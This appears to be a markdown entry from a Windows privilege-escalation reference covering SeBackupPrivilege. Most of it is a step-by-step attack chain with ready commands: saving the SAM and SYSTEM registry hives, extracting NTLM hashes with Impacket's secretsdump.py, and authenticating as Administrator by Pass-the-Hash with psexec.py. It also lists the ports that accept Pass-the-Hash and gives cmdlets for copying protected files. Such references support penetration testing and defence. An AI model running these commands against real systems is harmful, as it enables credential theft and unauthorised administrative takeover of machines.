Priv2Admin/SeBackupPrivilege.md

Privilege	Impact	Tool	Execution path	Remarks
SeBackup	Admin	3rd party tool Sensitive files access (in combination with SeRestore): Built-in commands	1. Enable the privilege in the token 2. Export the HKLM\SAM and HKLM\SYSTEM registry hives: cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM" 3. Eventually transfer the exported hives on a controlled computer 4. Extract the local accounts hashes from the export SAM hive. For example using Impacket's secretsdump.py Python script: secretsdump.py -sam SAM -system SYSTEM LOCAL 5. Authenticate as the local built-in Administrator, or another member of the local Administrators group, using its NTLM hash (Pass-the-Hash). For example using Impacket's psexec.py Python script: psexec.py -hashes ":<ADMINISTRATOR_NTLM>" <Administrator>@<TARGET_IP> Alternatively, can be used to read sensitive files with robocopy /b	- User Account Control may prevent Pass-the-Hash authentications with the local accounts but by default the built-in Administrator (RID 500) account is not concerned (as FilterAdministratorToken is disabled by default). - Pass-the-Hash authentications can be attempted over (at least) the following services: SMB (port TCP 445), SMB over NetBIOS (port TCP 139), WinRM (ports TCP 5985 / 5986), or RDP if the Restricted Admin feature is enabled server side (port TCP 3389). - Access to sensitive files may be more interesting if you can read %WINDIR%\MEMORY.DMP. - SeBackupPrivilege is not helpful when it comes to open and write to files as it may only be used to copy files. - Robocopy requires both SeBackup and SeRestore to work with the /b parameter (which are both granted to members of the Backup Operators group by default). Instead, Copy-FileSeBackupPrivilege can be used to backup files through a process with only the SeBackup privilege in its token: Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Set-SeBackupPrivilege Copy-FileSeBackupPrivilege <SOURCE_FILE> <DEST_FILE>